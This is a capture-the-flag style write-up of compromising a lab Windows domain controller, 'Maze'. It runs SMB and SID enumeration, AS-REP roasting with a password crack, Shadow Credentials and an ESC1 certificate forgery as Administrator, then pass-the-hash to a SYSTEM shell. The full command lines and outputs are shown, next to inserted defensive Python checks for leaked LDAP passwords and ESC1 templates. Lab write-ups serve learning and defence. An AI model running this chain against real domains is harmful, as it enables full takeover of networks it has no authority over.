Confidence target machine - Maze - Windows - ESC1 #
userflag #
Nmap port scan
nmap -sT -sC -p- 192.168.10.132
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
| ssl-cert: Subject: commonName=dc.confidence.com
| Subject Alternative Name: othername:<unsupported>, DNS:dc.confidence.com
| Not valid before: 2025-09-09T12:14:33
|_Not valid after: 2026-09-09T12:14:33
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
| ssl-cert: Subject: commonName=dc.confidence.com
| Subject Alternative Name: othername:<unsupported>, DNS:dc.confidence.com
| Not valid before: 2025-09-09T12:14:33
|_Not valid after: 2026-09-09T12:14:33
|_ssl-date: TLS randomness does not represent time
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc.confidence.com
| Subject Alternative Name: othername:<unsupported>, DNS:dc.confidence.com
| Not valid before: 2025-09-09T12:14:33
|_Not valid after: 2026-09-09T12:14:33
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
59557/tcp open unknown
59558/tcp open unknown
59565/tcp open unknown
59574/tcp open unknown
59580/tcp open unknown
59610/tcp open unknown
MAC Address: 00:0C:29:F7:7B:D8 (VMware)
Host script results:
| smb2-time:
| date: 2025-09-11T06:05:46
|_ start_date: N/A
|_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:f7:7b:d8 (VMware)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
|_clock-skew: -3s
Nmap done: 1 IP address (1 host up) scanned in 247.87 seconds
After the scan, add the host entry to the hosts file.
First check whether SMB exposes any shares.
└─# crackmapexec smb 192.168.10.132 -u '' -p '' --shares
SMB 192.168.10.132 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:confidence.com) (signing:True) (SMBv1:False)
SMB 192.168.10.132 445 DC [+] confidence.com\:
SMB 192.168.10.132 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
# smbclient -L //192.168.10.132
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk 远程管理
C$ Disk 默认共享
IPC$ IPC 远程 IPC
NETLOGON Disk Logon server share
readme Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 192.168.10.132 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
There is a readme share, let's take a look.
└─# smbclient //192.168.10.132/readme
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 9 09:25:09 2025
.. DHS 0 Tue Sep 9 09:28:52 2025
readme.txt.txt A 273 Tue Sep 9 09:25:11 2025
12923135 blocks of size 4096. 7950004 blocks available
smb: \> get readme.txt.txt
Nothing useful in it.
└─# cat /root/readme.txt.txt
I've already disabled Windows Defender, and the system updates have been completed. So, enjoy exploring! If you run into any issues or get stuck, feel free to reach out to me, Wackymaker. My intention is simply to make sure everyone can learn something from this experience
SMB allows anonymous access, so try lookupsid.py to enumerate users.
└─# lookupsid.py lucy@192.168.10.132
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
[*] Brute forcing SIDs at 192.168.10.132
[*] StringBinding ncacn_np:192.168.10.132[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3649830887-1815587496-1699028491
498: CONFIDENCE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CONFIDENCE\Administrator (SidTypeUser)
501: CONFIDENCE\Guest (SidTypeUser)
502: CONFIDENCE\krbtgt (SidTypeUser)
512: CONFIDENCE\Domain Admins (SidTypeGroup)
513: CONFIDENCE\Domain Users (SidTypeGroup)
514: CONFIDENCE\Domain Guests (SidTypeGroup)
515: CONFIDENCE\Domain Computers (SidTypeGroup)
516: CONFIDENCE\Domain Controllers (SidTypeGroup)
517: CONFIDENCE\Cert Publishers (SidTypeAlias)
518: CONFIDENCE\Schema Admins (SidTypeGroup)
519: CONFIDENCE\Enterprise Admins (SidTypeGroup)
520: CONFIDENCE\Group Policy Creator Owners (SidTypeGroup)
521: CONFIDENCE\Read-only Domain Controllers (SidTypeGroup)
522: CONFIDENCE\Cloneable Domain Controllers (SidTypeGroup)
525: CONFIDENCE\Protected Users (SidTypeGroup)
526: CONFIDENCE\Key Admins (SidTypeGroup)
527: CONFIDENCE\Enterprise Key Admins (SidTypeGroup)
553: CONFIDENCE\RAS and IAS Servers (SidTypeAlias)
571: CONFIDENCE\Allowed RODC Password Replication Group (SidTypeAlias)
572: CONFIDENCE\Denied RODC Password Replication Group (SidTypeAlias)
1000: CONFIDENCE\DC$ (SidTypeUser)
1101: CONFIDENCE\DnsAdmins (SidTypeAlias)
1102: CONFIDENCE\DnsUpdateProxy (SidTypeGroup)
1103: CONFIDENCE\ca-admin (SidTypeGroup)
1104: CONFIDENCE\ca-user (SidTypeUser)
1105: CONFIDENCE\mulis (SidTypeUser)
1106: CONFIDENCE\hyh (SidTypeUser)
Found the users hyh, mulis and ca-user.
Then use GetNPUsers.py to grab the AS-REP hash of any account that does not require Kerberos pre-authentication; that works for mulis, and john cracks it.
# GetNPUsers.py -usersfile /root/maze/conficenceuser.txt -no-pass -dc-ip 192.168.10.132 confidence.com/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User hyh doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$mulis@CONFIDENCE.COM:9757a526f685d1240449b7ccf2a4d87a$23f2b38d42eeddd793a20f980ab86d8e24807e64a9eeacef107b2e38258a8d154f8c8bc7ca17362af2ef366cd0fa87139a8f797a9b36ac1f478925688cbc16dd75d448e5a36a2da41c2dc8bd328ad51a2183b40c8d2e07386e79903d6a7cd021d4b549b774ea8f6c746f7551ca68dd5c93dd8779652c7995107c7bedd3d5521560c39f904c8cfd5e5ccf4b4625dd0ae684eebc34b0342fb654705d3965528c8edbac29ac6f2c2aa867e851b5df7a1a139e4f1a821ca7704b986dd400d6c53795b25639375d761c4ec6f46f96bb695b7123d6fc545930f3a8cd7104c75ab82fcf776831e1cfaea248a50a758bba1e5e9d
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
# john --wordlist=/usr/share/wordlists/rockyou.txt /root/maze/hash
babygirl ($krb5asrep$23$mulis@CONFIDENCE.COM)
After getting it I wasn't sure what to do next, because logging in with evil-winrm failed; I asked the author, who said to look at LDAP.
ldapsearch -x -H ldap://192.168.10.132 -D "mulis@confidence.com" -w babygirl -b "DC=confidence,DC=com" "(objectClass=user)" sAMAccountName memberOf description servicePrincipalName
The entry for hyh contains the following:
# hyh, Users, confidence.com
dn: CN=hyh,CN=Users,DC=confidence,DC=com
description:: 6L+Z5p2h6Lev5piv5a+555qE77yM5L2G5piv5L2g55yL5Yiw55qE6L+Y5LiN5aSf
5aSa
memberOf: CN=Remote Management Users,CN=Builtin,DC=confidence,DC=com
sAMAccountName: hyh
After base64-decoding it to UTF-8 we get a hint that what we have seen so far isn't complete, meaning our LDAP query isn't returning everything, so change the command to fetch all attributes:
ldapsearch -x -H ldap://192.168.10.132 -D "mulis@confidence.com" -w babygirl -b "CN=hyh,CN=Users,DC=confidence,DC=com" "*"
We get the password:
info: Password: 3948571026
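The folded, base64-encoded `description` above is easy to misread when grepping raw ldapsearch output. The following Python example is added here and is not part of the original writeup: it parses LDIF the way ldapsearch emits it, unfolding continuation lines and decoding `::` values, then flags free-text attributes such as description and info that carry a password. The sample LDIF is constructed from the hyh entry shown above.

```python
import base64
import re

# Constructed LDIF modelled on the ldapsearch output for hyh above
# (the folded base64 description is the one from the page).
SAMPLE_LDIF = """\
# hyh, Users, confidence.com
dn: CN=hyh,CN=Users,DC=confidence,DC=com
description:: 6L+Z5p2h6Lev5piv5a+555qE77yM5L2G5piv5L2g55yL5Yiw55qE6L+Y5LiN5aSf
 5aSa
memberOf: CN=Remote Management Users,CN=Builtin,DC=confidence,DC=com
sAMAccountName: hyh
info: Password: 3948571026
"""
SECRET_RE = re.compile(r"\b(password|passwd|pwd)\b\s*[:=]", re.IGNORECASE)  # credential-looking notes

def parse_ldif(text):
    """Parse LDIF into a list of {attribute: [values]} dicts, unfolding
    continuation lines (leading space) and decoding '::' base64 values."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]            # unfold continuation line
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:               # trailing "" flushes the last entry
        if line.startswith("#"):
            continue                        # LDIF comment
        if not line:
            if current:
                entries.append(current)
            current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):           # '::' marks a base64 value (non-ASCII text)
            value = base64.b64decode(value[1:].strip()).decode("utf-8")
        else:
            value = value.strip()
        current.setdefault(attr, []).append(value)
    return entries

def find_exposed_secrets(entries):
    """Return (sAMAccountName, attribute, value) for note fields that look like credentials."""
    hits = []
    for entry in entries:
        who = entry.get("sAMAccountName", ["?"])[0]
        for attr in ("description", "info", "comment"):
            hits += [(who, attr, v) for v in entry.get(attr, []) if SECRET_RE.search(v)]
    return hits
```

Running it over a full `ldapsearch ... "*"` export of the Users container is a quick way to audit for passwords left in note attributes.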
Log in and get the user flag:
*Evil-WinRM* PS C:\Users\hyh> cd Desktop
*Evil-WinRM* PS C:\Users\hyh\Desktop> dir
目录: C:\Users\hyh\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/9/2025 9:28 PM 34 user.txt
rootflag #
Here we use BloodHound to collect information.
bloodhound-python -u hyh -p "3948571026" -d confidence.com -ns 192.168.10.132 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: confidence.com
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.confidence.com
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.confidence.com
INFO: Found 7 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.confidence.com
INFO: Done in 00M 00S
INFO: Compressing output into 20250911042039_bloodhound.zip
Import the zip into BloodHound.
BloodHound shows that hyh has write access over the ca-user account, so we can obtain its hash directly via Shadow Credentials.
Shadow Credentials #
source certipy-3.12-env/bin/activate    (activate the virtual environment first; the tool requires Python 3.11)
└─# certipy shadow auto -username hyh@confidence.com -password 3948571026 -account ca-user -target dc.confidence.com -dc-ip 192.168.10.132
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca-user'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '6105a628c72a4425ae02b84c3ed67080'
[*] Adding Key Credential with device ID '6105a628c72a4425ae02b84c3ed67080' to the Key Credentials for 'ca-user'
[*] Successfully added Key Credential with device ID '6105a628c72a4425ae02b84c3ed67080' to the Key Credentials for 'ca-user'
[*] Authenticating as 'ca-user' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'ca-user@confidence.com'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca-user.ccache'
[*] Wrote credential cache to 'ca-user.ccache'
[*] Trying to retrieve NT hash for 'ca-user'
[*] Restoring the old Key Credentials for 'ca-user'
[*] Successfully restored the old Key Credentials for 'ca-user'
[*] NT hash for 'ca-user': 8636734a8c71b741a33bcb2bf323ea5c
With ca-user's hash in hand, run the vulnerability scan to look for vulnerable templates.
└─# certipy find -username ca-user -hashes :8636734a8c71b741a33bcb2bf323ea5c -dc-ip 192.168.10.132 -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 35 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'confidence-DC-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'confidence-DC-CA'
[*] Checking web enrollment for CA 'confidence-DC-CA' @ 'dc.confidence.com'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250911052914_Certipy.txt'
[*] Wrote text output to '20250911052914_Certipy.txt'
[*] Saving JSON output to '20250911052914_Certipy.json'
[*] Wrote JSON output to '20250911052914_Certipy.json'
cat 20250911052914_Certipy.txt
[+] User Enrollable Principals : CONFIDENCE.COM\Domain Computers
CONFIDENCE.COM\ca-admin
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
ESC1 found.
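Certipy derives the ESC1 verdict above from the template's AD attributes. The Python example below is added here and is not Certipy's code: it checks the same four preconditions against a constructed template dict modelled on the 'ca-login' finding (Domain Computers and ca-admin enrollable, requester-supplied subject, client-authentication EKU) and shows the two settings that close the gap. The attribute names are the real msPKI-* schema names; the template dict layout and the ca-login values are assumptions.

```python
# Relevant bits from [MS-CRTD], Microsoft's certificate-template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2           # in msPKI-Enrollment-Flag (manager approval)

# EKUs that let a certificate from the template be used for domain logon.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
# Heuristic: enrollment rights for anyone outside these groups count as low-privileged.
PRIVILEGED = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed template dict modelled on the page's 'ca-login' finding; keys are
# the real AD attribute names, the values are assumptions for this example.
CA_LOGIN = {
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["Domain Computers", "ca-admin"],
}

def esc1_conditions(t):
    """Return which ESC1 preconditions template `t` meets; ESC1 needs all four."""
    found = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        found.append("requester chooses the subject/SAN (UPN can be forged)")
    ekus = set(t["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:      # no EKU at all also permits logon
        found.append("certificate is valid for client authentication")
    if not (t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS) and t["msPKI-RA-Signature"] == 0:
        found.append("issued without manager approval or RA signature")
    low = set(t["enroll"]) - PRIVILEGED
    if low:
        found.append("enrollable by low-privileged principals: " + ", ".join(sorted(low)))
    return found

def is_esc1(t):
    return len(esc1_conditions(t)) == 4

def harden(t):
    """Copy of `t` with the two changes that close ESC1: subject built from AD, issuance approved."""
    fixed = dict(t)
    fixed["msPKI-Certificate-Name-Flag"] &= ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    fixed["msPKI-Enrollment-Flag"] |= CT_FLAG_PEND_ALL_REQUESTS
    return fixed
```

Either change alone is enough to break the ESC1 chain; tightening the enrollment ACL to the principals that actually need the template is the third lever.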
ESC1 #
1 Request the certificate
└─# certipy req -u ca-user@confidence.com -hashes :8636734a8c71b741a33bcb2bf323ea5c \
-ca confidence-DC-CA -target dc.confidence.com \
-template ca-login \
-upn administrator@confidence.com \
-sid S-1-5-21-3649830887-1815587496-1699028491-500 \
-out administrator \
-dc-ip 192.168.10.132
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 10
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@confidence.com'
[*] Certificate object SID is 'S-1-5-21-3649830887-1815587496-1699028491-500'
[*] Saving certificate and private key to 'administrator.pfx'
File 'administrator.pfx' already exists. Overwrite? (y/n - saying no will save with a unique filename):
[*] Wrote certificate and private key to 'administrator_1abcd36f-ea00-404e-955c-50be33193359.pfx'
certipy req: Certipy's "certificate request" subcommand, used to request a certificate from the domain CA
-u ca-user@confidence.com: the account used to request the certificate: domain user ca-user (UPN format; confidence.com is the target domain)
-hashes :8636734a8c71b741a33bcb2bf323ea5c: ca-user's NTLM hash (an empty value before the colon means no LM hash, only the NT hash is used; the hash is ca-user's credential, so no plaintext password is needed)
-ca confidence-DC-CA: the name of the target domain's certificate authority (CA): confidence-DC-CA (the DC usually acts as the CA; the format is "domain-DC-CA")
-target dc.confidence.com: the server the certificate request is sent to: the domain controller dc.confidence.com (the CA service runs on the DC)
-template ca-login: the certificate template to request: ca-login (it must be a template usable for authentication in the domain, and ca-user must have enrollment rights on it)
-upn administrator@confidence.com: the key forged parameter: sets the certificate's User Principal Name (UPN) to administrator@confidence.com (i.e. impersonating the domain administrator account)
-sid S-1-5-21-...-500: the key forged parameter: sets the SID bound to the certificate to the administrator's SID (-500 is the default SID of the domain administrator, ensuring the certificate is recognised as the administrator)
-out administrator: output file prefix: the generated certificate and private key are named administrator
-dc-ip 192.168.10.132: the domain controller's IP address: avoids DNS resolution problems by connecting to the DC directly by IP
2 Get the NT hash
└─# certipy auth -pfx administrator_1abcd36f-ea00-404e-955c-50be33193359.pfx -dc-ip 192.168.10.132
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@confidence.com'
[*] SAN URL SID: 'S-1-5-21-3649830887-1815587496-1699028491-500'
[*] Security Extension SID: 'S-1-5-21-3649830887-1815587496-1699028491-500'
[*] Using principal: 'administrator@confidence.com'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
File 'administrator.ccache' already exists. Overwrite? (y/n - saying no will save with a unique filename):
[*] Wrote credential cache to 'administrator_3460f055-68bf-49c8-a389-5a8afc641fee.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@confidence.com': aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34
certipy auth: Certipy's "certificate authentication" subcommand, used to complete Kerberos authentication with a PFX certificate
-pfx administrator_xxx.pfx: the forged certificate file generated in the previous step (contains the administrator-identity certificate and private key)
-dc-ip 192.168.10.132: specify the DC's IP directly to make sure the connection works
Command execution flow and result:
- Certificate authentication: certipy reads the certificate from the PFX file and proves to the domain controller that "it is administrator" (because the certificate's UPN and SID are both the administrator's);
- Obtaining a TGT: once the DC validates the certificate, it issues a Ticket Granting Ticket (TGT) carrying administrator privileges and saves it as administrator_xxx.ccache (a Kerberos credential cache file);
- Extracting the administrator hash: using the administrator TGT, the administrator's NT hash is read from the DC, giving the final result: aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34
- First, ca-user's privileges (possibly obtained earlier via GenericWrite) are used to request a certificate "disguised as the administrator";
- Then that forged certificate is used to authenticate to the domain, obtain administrator Kerberos credentials and finally extract the administrator's NT hash;
- With the administrator hash, pass-the-hash can be used to log in to the DC directly and take full control.
3 Log in
psexec.py administrator@192.168.10.132 -hashes aad3b435b51404eeaad3b435b51404ee:bbabdc192282668fe5190ab0c5150b34
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 192.168.10.132.....
[*] Found writable share ADMIN$
[*] Uploading file UTLKILTt.exe
[*] Opening SVCManager on 192.168.10.132.....
[*] Creating service bROc on 192.168.10.132.....
[*] Starting service bROc.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [版本 10.0.20348.4052]
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation。保留所有权利。
C:\Windows\system32> whoami
nt authority\system